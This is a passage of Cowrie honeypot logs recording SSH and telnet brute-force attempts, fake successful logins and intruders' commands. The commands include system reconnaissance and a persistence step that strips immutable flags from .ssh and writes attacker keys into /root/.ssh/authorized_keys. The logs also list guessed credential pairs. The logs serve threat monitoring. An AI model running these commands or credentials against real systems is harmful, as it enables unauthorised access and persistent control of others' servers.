~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:37:50.309729Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:37:50.935450Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:50.936339Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34242,"dst_ip":"1.2.3.4","dst_port":22,"session":"b981a6ae6fa7","protocol":"ssh","message":"New connection: 212.227.235.229:34242 (1.2.3.4:22) [session: b981a6ae6fa7]","sensor":"my-vps","timestamp":"2025-09-08T23:37:51.247440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:51.248328Z","src_ip":"212.227.235.229","session":"b981a6ae6fa7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:51.558742Z","src_ip":"212.227.235.229","session":"b981a6ae6fa7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:37:53.231567Z","src_ip":"212.227.235.229","session":"b981a6ae6fa7"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:54.545238Z","src_ip":"212.227.235.229","session":"b981a6ae6fa7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34252,"dst_ip":"1.2.3.4","dst_port":22,"session":"648d1f77c2d5","protocol":"ssh","message":"New connection: 212.227.235.229:34252 (1.2.3.4:22) [session: 648d1f77c2d5]","sensor":"my-vps","timestamp":"2025-09-08T23:37:54.846649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:54.847329Z","src_ip":"212.227.235.229","session":"648d1f77c2d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:55.152488Z","src_ip":"212.227.235.229","session":"648d1f77c2d5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:37:56.641354Z","src_ip":"212.227.235.229","session":"648d1f77c2d5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:56.948234Z","src_ip":"212.227.235.229","session":"648d1f77c2d5"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:56.949305Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":59222,"dst_ip":"1.2.3.4","dst_port":22,"session":"706b6bfbc2c3","protocol":"ssh","message":"New connection: 46.101.8.63:59222 (1.2.3.4:22) [session: 706b6bfbc2c3]","sensor":"my-vps","timestamp":"2025-09-08T23:38:05.322078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:38:05.323134Z","src_ip":"46.101.8.63","session":"706b6bfbc2c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:38:05.346168Z","src_ip":"46.101.8.63","session":"706b6bfbc2c3"}
{"eventid":"cowrie.login.failed","username":"test3","password":"12345678","message":"login attempt [test3/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T23:38:05.479041Z","src_ip":"46.101.8.63","session":"706b6bfbc2c3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:06.504863Z","src_ip":"46.101.8.63","session":"706b6bfbc2c3"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":53398,"dst_ip":"1.2.3.4","dst_port":22,"session":"135cd42ed393","protocol":"ssh","message":"New connection: 93.113.63.124:53398 (1.2.3.4:22) [session: 135cd42ed393]","sensor":"my-vps","timestamp":"2025-09-08T23:38:21.231520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:38:21.232515Z","src_ip":"93.113.63.124","session":"135cd42ed393"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:38:21.304113Z","src_ip":"93.113.63.124","session":"135cd42ed393"}
{"eventid":"cowrie.login.failed","username":"owner","password":"owner","message":"login attempt [owner/owner] failed","sensor":"my-vps","timestamp":"2025-09-08T23:38:21.772362Z","src_ip":"93.113.63.124","session":"135cd42ed393"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:22.847726Z","src_ip":"93.113.63.124","session":"135cd42ed393"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":42064,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad8c27d6f9e7","protocol":"ssh","message":"New connection: 45.150.34.92:42064 (1.2.3.4:22) [session: ad8c27d6f9e7]","sensor":"my-vps","timestamp":"2025-09-08T23:38:26.779176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:38:26.779953Z","src_ip":"45.150.34.92","session":"ad8c27d6f9e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:38:26.797708Z","src_ip":"45.150.34.92","session":"ad8c27d6f9e7"}
{"eventid":"cowrie.login.failed","username":"taibabi","password":"taibabi","message":"login attempt [taibabi/taibabi] failed","sensor":"my-vps","timestamp":"2025-09-08T23:38:26.907735Z","src_ip":"45.150.34.92","session":"ad8c27d6f9e7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:27.928442Z","src_ip":"45.150.34.92","session":"ad8c27d6f9e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55882,"dst_ip":"1.2.3.4","dst_port":22,"session":"10802bf2d959","protocol":"ssh","message":"New connection: 212.227.235.229:55882 (1.2.3.4:22) [session: 10802bf2d959]","sensor":"my-vps","timestamp":"2025-09-08T23:38:33.089537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-09-08T23:38:33.090496Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-09-08T23:38:33.469699Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-08T23:38:35.045558Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:38:36.427462Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:38:37.236545Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-08T23:38:37.237238Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-08T23:38:37.237653Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:39.089178Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32995,"dst_ip":"1.2.3.4","dst_port":23,"session":"9456768adc80","protocol":"telnet","message":"New connection: 212.227.235.229:32995 (1.2.3.4:23) [session: 9456768adc80]","sensor":"my-vps","timestamp":"2025-09-08T23:38:39.843749Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:38:39.904541Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-09-08T23:38:39.905247Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":36782,"dst_ip":"1.2.3.4","dst_port":22,"session":"721e13292dcd","protocol":"ssh","message":"New connection: 182.18.161.165:36782 (1.2.3.4:22) [session: 721e13292dcd]","sensor":"my-vps","timestamp":"2025-09-08T23:38:42.908764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:38:42.909725Z","src_ip":"182.18.161.165","session":"721e13292dcd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:38:43.165029Z","src_ip":"182.18.161.165","session":"721e13292dcd"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1","message":"login attempt [mysql/1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:38:44.226527Z","src_ip":"182.18.161.165","session":"721e13292dcd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:45.484702Z","src_ip":"182.18.161.165","session":"721e13292dcd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63762,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc06e4e11778","protocol":"ssh","message":"New connection: 217.72.205.35:63762 (1.2.3.4:22) [session: bc06e4e11778]","sensor":"my-vps","timestamp":"2025-09-08T23:38:47.184639Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:47.185661Z","src_ip":"217.72.205.35","session":"bc06e4e11778"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"10.0","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:49.856730Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:38:51.616411Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T23:38:51.617090Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:51.999001Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:38:52.853855Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-09-08T23:38:52.854555Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.session.closed","duration":13.195058107376099,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:38:53.038732Z","src_ip":"212.227.235.229","session":"9456768adc80"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":56610,"dst_ip":"1.2.3.4","dst_port":22,"session":"aea6e22c2648","protocol":"ssh","message":"New connection: 46.101.8.63:56610 (1.2.3.4:22) [session: aea6e22c2648]","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.415364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.416293Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.439777Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.login.success","username":"root","password":"bullet","message":"login attempt [root/bullet] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.578437Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:39:01.705279Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.706010Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.707215Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
